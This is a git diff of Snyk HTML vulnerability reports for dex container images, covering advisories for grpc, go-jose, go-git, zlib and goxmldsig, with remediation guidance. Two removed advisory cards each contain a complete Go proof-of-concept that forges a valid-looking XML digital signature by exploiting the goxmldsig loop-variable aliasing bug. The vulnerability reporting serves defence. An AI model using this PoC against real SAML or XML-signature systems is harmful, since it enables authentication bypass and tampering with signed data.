<li><a href="https://www.vulncheck.com/advisories/zlib-untgz-global-buffer-overflow-in-tgzfname">https://www.vulncheck.com/advisories/zlib-untgz-global-buffer-overflow-in-tgzfname</a></li>
<li><a href="https://zlib.net/">https://zlib.net/</a></li>
<li><a href="https://github.com/madler/zlib/issues/1142">https://github.com/madler/zlib/issues/1142</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-ZLIB-15435528">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
@@ -670,279 +686,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Proof of Concept</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/dexidp/dex <span class="list-paths__item__arrow"></span> /usr/local/bin/dex
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/russellhaering/goxmldsig
</li>
<li class="card__meta__item">Introduced through:
github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/russellhaering/goxmldsig@v1.5.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
<p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
<h2 id="poc">PoC</h2>
<pre><code>package main
import (
&quot;crypto/rand&quot;
&quot;crypto/rsa&quot;
&quot;crypto/tls&quot;
&quot;crypto/x509&quot;
&quot;encoding/base64&quot;
&quot;fmt&quot;
&quot;math/big&quot;
&quot;time&quot;
&quot;github.com/beevik/etree&quot;
dsig &quot;github.com/russellhaering/goxmldsig&quot;
)
func main() {
key, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
panic(err)
}
template := &amp;x509.Certificate{
SerialNumber: big.NewInt(1),
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(1 * time.Hour),
}
certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
if err != nil {
panic(err)
}
cert, _ := x509.ParseCertificate(certDER)
doc := etree.NewDocument()
root := doc.CreateElement(&quot;Root&quot;)
root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
root.SetText(&quot;Malicious Content&quot;)
tlsCert := tls.Certificate{
Certificate: [][]byte{cert.Raw},
PrivateKey: key,
}
ks := dsig.TLSCertKeyStore(tlsCert)
signingCtx := dsig.NewDefaultSigningContext(ks)
sig, err := signingCtx.ConstructSignature(root, true)
if err != nil {
panic(err)
}
signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
originalEl := etree.NewElement(&quot;Root&quot;)
originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
originalEl.SetText(&quot;Original Content&quot;)
sig1, _ := signingCtx.ConstructSignature(originalEl, true)
ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
signedInfo.InsertChildAt(existingRef.Index(), ref1)
c14n := signingCtx.Canonicalizer
detachedSI := signedInfo.Copy()
if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
}
canonicalBytes, err := c14n.Canonicalize(detachedSI)
if err != nil {
fmt.Println(&quot;c14n error:&quot;, err)
return
}
hash := signingCtx.Hash.New()
hash.Write(canonicalBytes)
digest := hash.Sum(nil)
rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
if err != nil {
panic(err)
}
sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
certStore := &amp;dsig.MemoryX509CertificateStore{
Roots: []*x509.Certificate{cert},
}
valCtx := dsig.NewDefaultValidationContext(certStore)
root.AddChild(sig)
doc.SetRoot(root)
str, _ := doc.WriteToString()
fmt.Println(&quot;XML:&quot;)
fmt.Println(str)
validated, err := valCtx.Validate(root)
if err != nil {
fmt.Println(&quot;validation failed:&quot;, err)
} else {
fmt.Println(&quot;validation ok&quot;)
fmt.Println(&quot;validated text:&quot;, validated.Text())
}
}
</code></pre>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Uncaught Exception</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-jose/go-jose/v4
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v5@* and github.com/go-jose/go-jose/v4@v4.1.3
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v5@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.1.3
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.1.3
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Uncaught Exception in the <code>cipher.KeyUnwrap</code> function when decrypting a JSON Web Encryption (JWE) object with a key wrapping algorithm (ending in &#39;KW&#39;, except for &#39;A128GCMKW&#39;, &#39;A192GCMKW&#39;, and &#39;A256GCMKW&#39;) and the <code>encrypted_key</code> field is empty. An attacker can cause a panic and disrupt service by submitting a crafted JWE object with an empty <code>encrypted_key</code> field or by directly invoking <code>cipher.KeyUnwrap</code> with a ciphertext parameter less than 16 bytes long.</p>
<p><strong>Note:</strong></p>
<p>This is only exploitable if the list of accepted key algorithms includes key wrapping algorithms.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by prevalidating JWE objects to ensure the <code>encrypted_key</code> field is nonempty, or by excluding key wrapping algorithms from the list of accepted key algorithms.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-jose/go-jose/v4</code> to version 4.1.4 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8">GitHub Advisory</a></li>
<li><a href="https://github.com/go-jose/go-jose/commit/0e59876635f3dbf46d7b5e97b52bb75a3f96e7d9">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV4-15875221">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Improper Validation of Specified Quantity in Input</h2>
@@ -1030,9 +773,9 @@
<h2 id="references">References</h2>
<ul>
<li><a href="https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/">https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/</a></li>
<li><a href="https://github.com/madler/zlib/issues/904">https://github.com/madler/zlib/issues/904</a></li>
<li><a href="https://github.com/madler/zlib/releases/tag/v1.3.2">https://github.com/madler/zlib/releases/tag/v1.3.2</a></li>
<li><a href="https://ostif.org/zlib-audit-complete/">https://ostif.org/zlib-audit-complete/</a></li>
<li><a href="https://github.com/madler/zlib/issues/904">https://github.com/madler/zlib/issues/904</a></li>
<li><a href="https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf">https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf</a></li>
</ul>
@@ -2692,153 +2435,6 @@
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Allocation of Resources Without Limits or Throttling</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--medium">
<span class="label__text">medium severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-git/go-git/v5/plumbing/format/index
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v5@* and github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v5@*
<span class="list-paths__item__arrow"></span>
github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the handling of <code>.idx</code> files. An attacker with write access to the local repository&#39;s <code>.git</code> directory can exhaust system memory by introducing a maliciously crafted <code>.idx</code> file into the <code>.git</code> directory.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-git/go-git/v5/plumbing/format/index</code> to version 5.17.1 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-git/go-git/security/advisories/GHSA-jhf3-xxhw-2wpp">GitHub Advisory</a></li>
<li><a href="https://github.com/go-git/go-git/commit/3ec0d70cb687ae1da5f4d18faa4229bd971a8710">GitHub Commit</a></li>
<li><a href="https://github.com/go-git/go-git/commit/6b38a326816b80f64c20cc0e6113958b65c05a1c">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOGITGOGITV5PLUMBINGFORMATINDEX-15855220">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Improper Validation of Array Index</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--medium">
<span class="label__text">medium severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-git/go-git/v5/plumbing/format/index
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v5@* and github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v5@*
<span class="list-paths__item__arrow"></span>
github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Improper Validation of Array Index through improper validation in the index decoding for version 4 files. An attacker with write access to the <code>.git</code> directory to modify or inject the index file can cause a panic and terminate the process by supplying a maliciously crafted <code>.git/index</code> file that triggers an out-of-bounds slice operation during index parsing.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-git/go-git/v5/plumbing/format/index</code> to version 5.17.1 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-git/go-git/security/advisories/GHSA-gm2x-2g9h-ccm8">GitHub Advisory</a></li>
<li><a href="https://github.com/go-git/go-git/commit/e9b65df44cb97faeba148b47523a362beaecddf9">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOGITGOGITV5PLUMBINGFORMATINDEX-15855246">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
</div><!-- cards -->
</div>
</main><!-- .layout-stacked__content -->

View File

@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:34:14 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:28:23 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

View File

@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:34:20 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:28:29 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

File diff suppressed because it is too large Load Diff

View File

@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:47:53 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:38:20 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

View File

@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:48:02 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:38:29 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

File diff suppressed because it is too large Load Diff

View File

@@ -7,7 +7,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Snyk test report</title>
<meta name="description" content="49 known vulnerabilities found in 146 vulnerable dependency paths.">
<meta name="description" content="46 known vulnerabilities found in 141 vulnerable dependency paths.">
<base target="_blank">
<link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
sizes="194x194">
@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:45:57 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:36:29 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following paths:</span>
@@ -505,9 +505,9 @@
</div>
<div class="meta-counts">
<div class="meta-count"><span>49</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>146 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1134</span> <span>dependencies</span></div>
<div class="meta-count"><span>46</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>141 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1131</span> <span>dependencies</span></div>
</div><!-- .meta-counts -->
</div><!-- .layout-container--short -->
</header><!-- .project__header -->
@@ -515,89 +515,6 @@
<div class="layout-container" style="padding-top: 35px;">
<div class="cards--vuln filter--patch filter--ignore">
<div class="card card--vuln disclosure--not-new severity--critical" data-snyk-test="critical">
<h2 class="card__title">Incorrect Authorization</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--critical">
<span class="label__text">critical severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
google.golang.org/grpc
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v4@* and google.golang.org/grpc@v1.68.1
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v4@*
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.68.1
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.72.1
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">CVE-2025-69421</h2>
<div class="card__section">
@@ -1138,193 +1055,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Proof of Concept</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/dexidp/dex <span class="list-paths__item__arrow"></span> /usr/local/bin/dex
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/russellhaering/goxmldsig
</li>
<li class="card__meta__item">Introduced through:
github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/russellhaering/goxmldsig@v1.5.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
<p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
<h2 id="poc">PoC</h2>
<pre><code>package main
import (
&quot;crypto/rand&quot;
&quot;crypto/rsa&quot;
&quot;crypto/tls&quot;
&quot;crypto/x509&quot;
&quot;encoding/base64&quot;
&quot;fmt&quot;
&quot;math/big&quot;
&quot;time&quot;
&quot;github.com/beevik/etree&quot;
dsig &quot;github.com/russellhaering/goxmldsig&quot;
)
func main() {
key, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
panic(err)
}
template := &amp;x509.Certificate{
SerialNumber: big.NewInt(1),
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(1 * time.Hour),
}
certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
if err != nil {
panic(err)
}
cert, _ := x509.ParseCertificate(certDER)
doc := etree.NewDocument()
root := doc.CreateElement(&quot;Root&quot;)
root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
root.SetText(&quot;Malicious Content&quot;)
tlsCert := tls.Certificate{
Certificate: [][]byte{cert.Raw},
PrivateKey: key,
}
ks := dsig.TLSCertKeyStore(tlsCert)
signingCtx := dsig.NewDefaultSigningContext(ks)
sig, err := signingCtx.ConstructSignature(root, true)
if err != nil {
panic(err)
}
signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
originalEl := etree.NewElement(&quot;Root&quot;)
originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
originalEl.SetText(&quot;Original Content&quot;)
sig1, _ := signingCtx.ConstructSignature(originalEl, true)
ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
signedInfo.InsertChildAt(existingRef.Index(), ref1)
c14n := signingCtx.Canonicalizer
detachedSI := signedInfo.Copy()
if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
}
canonicalBytes, err := c14n.Canonicalize(detachedSI)
if err != nil {
fmt.Println(&quot;c14n error:&quot;, err)
return
}
hash := signingCtx.Hash.New()
hash.Write(canonicalBytes)
digest := hash.Sum(nil)
rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
if err != nil {
panic(err)
}
sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
certStore := &amp;dsig.MemoryX509CertificateStore{
Roots: []*x509.Certificate{cert},
}
valCtx := dsig.NewDefaultValidationContext(certStore)
root.AddChild(sig)
doc.SetRoot(root)
str, _ := doc.WriteToString()
fmt.Println(&quot;XML:&quot;)
fmt.Println(str)
validated, err := valCtx.Validate(root)
if err != nil {
fmt.Println(&quot;validation failed:&quot;, err)
} else {
fmt.Println(&quot;validation ok&quot;)
fmt.Println(&quot;validated text:&quot;, validated.Text())
}
}
</code></pre>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Asymmetric Resource Consumption (Amplification)</h2>
@@ -1399,92 +1129,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOLANGJWTJWTV5-9510922">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Uncaught Exception</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-jose/go-jose/v4
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v4@* and github.com/go-jose/go-jose/v4@v4.0.2
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v4@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.0.2
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.1.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Uncaught Exception in the <code>cipher.KeyUnwrap</code> function when decrypting a JSON Web Encryption (JWE) object with a key wrapping algorithm (ending in &#39;KW&#39;, except for &#39;A128GCMKW&#39;, &#39;A192GCMKW&#39;, and &#39;A256GCMKW&#39;) and the <code>encrypted_key</code> field is empty. An attacker can cause a panic and disrupt service by submitting a crafted JWE object with an empty <code>encrypted_key</code> field or by directly invoking <code>cipher.KeyUnwrap</code> with a ciphertext parameter less than 16 bytes long.</p>
<p><strong>Note:</strong></p>
<p>This is only exploitable if the list of accepted key algorithms includes key wrapping algorithms.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by prevalidating JWE objects to ensure the <code>encrypted_key</code> field is nonempty, or by excluding key wrapping algorithms from the list of accepted key algorithms.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-jose/go-jose/v4</code> to version 4.1.4 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8">GitHub Advisory</a></li>
<li><a href="https://github.com/go-jose/go-jose/commit/0e59876635f3dbf46d7b5e97b52bb75a3f96e7d9">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV4-15875221">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Inefficient Algorithmic Complexity</h2>

View File

@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:40:22 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:36:33 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

View File

@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:46:10 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:36:40 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following paths:</span>
@@ -505,7 +505,7 @@
<div class="meta-counts">
<div class="meta-count"><span>12</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>100 vulnerable dependency paths</span></div>
<div class="meta-count"><span>20</span> <span>dependencies</span></div>
<div class="meta-count"><span>19</span> <span>dependencies</span></div>
</div><!-- .meta-counts -->
</div><!-- .layout-container--short -->
</header><!-- .project__header -->

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:45:13 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:35:48 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

View File

